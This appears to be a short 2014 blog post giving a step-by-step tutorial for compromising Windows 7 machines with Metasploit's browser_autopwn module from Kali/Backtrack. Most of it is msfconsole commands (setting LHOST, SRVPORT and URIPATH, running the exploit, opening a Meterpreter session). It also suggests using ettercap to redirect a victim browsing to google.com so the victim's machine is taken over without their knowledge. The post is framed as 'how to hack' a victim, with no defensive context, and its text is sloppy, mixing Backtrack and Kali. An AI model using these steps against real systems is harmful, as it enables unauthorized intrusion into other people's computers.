Tuesday 29 July 2014

exploiting windows7 using kali linux

How to Hack Windows 7  Using Metasploit In Kali Linux Tutorial


1). Start Backtrack
2). Type "Startx" To enter GUI mode of Backtrack.
3). Go To terminal
4). Type "msfconsole"

In Victim Machine
1). Start the victim Machine

Back to Backtrack
5). Type msf:>use auxiliary/server/browser_autopwn

[center][Image: 11653182.png][/center]

6). Thentype msf :>show Options Set LHOST means Localhost ip address To checkLocalhost ip Go to terminal And type "ifconfig"

7). msf:>set LHOST eg.192.168.168.1 After That you want set SRVPORT which is 80 or 8080

8). msf:>set SRVPORT 80 Then set URIPATH eg.root "/"

9). msf:>set URIPATH /

[center][Image: 11653227.png][/center]
Now Everything Is done

10). msf:>exploit or run

[center][Image: 11653242.png][/center]
Now What to need To to open On victim Machine

Open Any Browser Type Your BAcktrack Machine's ip address eg.<!-- m --><a class="postlink" href="http://192.168.168.1/">http://192.168.168.1/</a><!-- m -->

If You don't want to open backtrack machine's ip Address you can also do it With "ettercap" if user open <!-- m --><a class="postlink" href="http://www.google.com">http://www.google.com</a><!-- m --> it can also hacked.

After A minute you Can see our Session Is open

[center][Image: 11653314.png][/center]
To open a Meterprete

type msf:>sessions -i 1

[center][Image: 11653345.png][/center]

0 comments:

Post a Comment